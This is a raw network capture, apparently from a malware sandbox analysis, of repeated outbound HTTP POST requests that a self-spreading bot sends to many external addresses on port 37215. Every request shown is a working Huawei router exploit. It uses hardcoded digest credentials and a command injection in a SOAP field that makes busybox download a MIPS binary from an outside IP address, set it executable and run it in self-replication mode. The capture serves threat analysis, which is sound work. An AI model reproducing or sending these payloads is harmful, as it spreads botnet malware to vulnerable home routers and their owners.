6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                134192.168.2.1446850157.22.107.20837215
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.830569983 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                Connection: keep-alive
                                                Accept: */*
                                                Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                Content-Length: 482
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                135192.168.2.1456116157.184.79.18337215
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.830569983 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                Connection: keep-alive
                                                Accept: */*
                                                Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                Content-Length: 482
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                136192.168.2.145609241.248.234.13337215
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.830569983 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                Connection: keep-alive
                                                Accept: */*
                                                Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                Content-Length: 482
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                137192.168.2.144349441.146.165.18437215
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.830569983 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                Connection: keep-alive
                                                Accept: */*
                                                Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                Content-Length: 482
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                138192.168.2.145092618.5.132.17037215
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.830569983 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                Connection: keep-alive
                                                Accept: */*
                                                Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                Content-Length: 482
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                139192.168.2.1452176198.80.229.18537215
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.830569983 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                Connection: keep-alive
                                                Accept: */*
                                                Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                Content-Length: 482
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                140192.168.2.1459386157.32.82.17537215
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.830569983 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                Connection: keep-alive
                                                Accept: */*
                                                Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                Content-Length: 482
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                141192.168.2.1447186157.145.195.15337215
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.830569983 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                Connection: keep-alive
                                                Accept: */*
                                                Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                Content-Length: 482
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                142192.168.2.144209241.209.69.23537215
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.830837965 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                Connection: keep-alive
                                                Accept: */*
                                                Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                Content-Length: 482
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                143192.168.2.1436520197.157.247.23437215
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.830837965 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                Connection: keep-alive
                                                Accept: */*
                                                Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                Content-Length: 482
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                144192.168.2.1449388157.196.44.13337215
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.830837965 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                Connection: keep-alive
                                                Accept: */*
